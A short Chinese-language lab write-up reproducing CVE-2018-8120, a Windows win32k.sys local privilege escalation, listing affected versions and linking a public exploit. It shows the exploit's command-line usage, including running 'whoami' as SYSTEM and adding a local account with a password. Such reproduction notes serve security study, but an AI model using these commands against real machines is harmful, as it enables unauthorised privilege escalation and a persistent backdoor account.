CVE-2018-8120 Windows本地提权漏洞复现

CVE-2018-8120 Windows本地提权漏洞复现

一、漏洞描述

部分版本Windows系统win32k.sys组件的NtUserSetImeInfoEx()系统服务函数内部未验证内核对象中的空指针对象,普通应用程序可利用该空指针漏洞以内核权限执行任意代码。

二、影响版本

以下软件版本受到影响:

Win7 x32/x64  
Win2008 x32/64  
Win2008R2 x32/64

三、提权利用

1、测试环境

2、查询当前用户权限,可以看不到不是system权限。

3、下载EXP文件

https://github.com/unamer/CVE-2018-8120

用法:

CVE-2018-8120 exploit by @unamer(https://github.com/unamer)
Usage: exp.exe command
Example: exp.exe "net user admin admin /add"

4、把exp放进去执行,执行语句为

CVE-2018-8120.exe "whoami"

可以看到,权限提升成功。

5、进一步提权,添加本地账号

CVE-2018-8120.exe "net user hello Test@2022 /add"

win2008 r2 x64 本地提权成功